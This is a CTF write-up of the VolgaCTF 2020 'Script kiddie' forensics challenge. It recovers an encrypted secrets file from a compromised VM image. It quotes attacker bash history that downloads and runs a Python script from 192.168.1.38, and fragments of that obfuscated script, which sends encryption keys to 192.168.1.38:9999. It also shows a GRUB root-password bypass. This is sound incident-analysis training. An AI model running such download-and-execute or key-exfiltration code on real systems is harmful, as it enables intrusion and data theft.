CTFtime.org / VolgaCTF 2020 Qualifier / Script kiddie / Writeup

In this challenge we were presented with an OVA archive. After importing and running the VM we had to reset the root password. A common method is to set init=/bin/sh in GRUB.

Then we extracted the relevant files from /home which had two users prod and test.

So let's find out what has happened on the system:

.bash_history for test had following entries:

curl http://192.168.1.38/clev.py > .s.py
curl http://192.168.1.38:8080/clev.py > .s.py
curl http://192.168.1.38:8888/clev.py > .s.py
curl http://192.168.1.38:1111/clev.py > .s.py
file .s.py
python3.7 .s.py 
rm .s.py
...

so someone downloaded a file, executed it, then removed it. secrets.txt.enc is likely our candidate for the flag, which was encrypted in /home/test/data. Since we don't have the script we continue somewhere else.

/home/prod included a PCAP file. A quick filter for port 1111 revealed an obfuscated Python script. Some observations:

  for x in o(16):
   p=''.join(random.choices(C,k=16))
   M.append(p)

Since p gets overwritten every iteration, only the last value for "p" is used in the encryption.

  u=','.join(k for k in M)
  u=W(u,"utf-8")
  u=base64.b64encode(u)
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect(g)
  s.sendall(W(Q.id,"utf-8"))
  s.recv(1)
  s.sendall(u)

This will send the keys to another server: 192.168.1.38:9999.

A quick look in the PCAP confirms this. It sends some ID for the machine then all 16 keys in base64 encoding:

bVRHZWxqaERSS0FTS0toUSxGTHJzU0V2ZVFRaWxvUFJuLFhlZFhIWUJVSHBJWERCSlAsSU9HUEVyam9zeE5pUXJOTSxSenZwYkVVUkxkRmZhR0ZNLHZkQlZEQ3ZpeGpTaENRdnksRVFsY3NuVXR6Q0h5RlBITSxKa0RpamdBRmlWQldKYUx6LGdoY1BJT1NxQ2RDVHFPcEQsRG5lQ3dia0RIa29qcHBIbSxsVlJaUmVBbGFJekhnaXNjLE5kamNnVlZqaWlueGZ0Q0MsUmtnTHBSQ3FybmlicnFzTixremV3dGVBZ1BFWmRrelFKLEhucEdvVWVxY2tFcXhwUW0sTFNOV1JhclRoUmRpUExwTQ==

Base64 decoding gives us the keys:

mTGeljhDRKASKKhQ,FLrsSEveQQiloPRn,XedXHYBUHpIXDBJP,IOGPErjosxNiQrNM,RzvpbEURLdFfaGFM,vdBVDCvixjShCQvy,EQlcsnUtzCHyFPHM,JkDijgAFiVBWJaLz,ghcPIOSqCdCTqOpD,DneCwbkDHkojppHm,lVRZReAlaIzHgisc,NdjcgVVjiinxftCC,RkgLpRCqrnibrqsN,kzewteAgPEZdkzQJ,HnpGoUeqckEqxpQm,LSNWRarThRdiPLpM

So in order to decrypt the file we take the last key (LSNWRarThRdiPLpM) from the 16.

>>> f=open("secrets.txt.enc", "rb")
>>> f1=f.read()
>>> from Crypto.Cipher import AES
>>> c=AES.new("LSNWRarThRdiPLpM",AES.MODE_ECB)
>>> c.decrypt(f1)
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n\t\t\t\t\t\t\t\t\t'

Script kiddie

Comments

Sign in with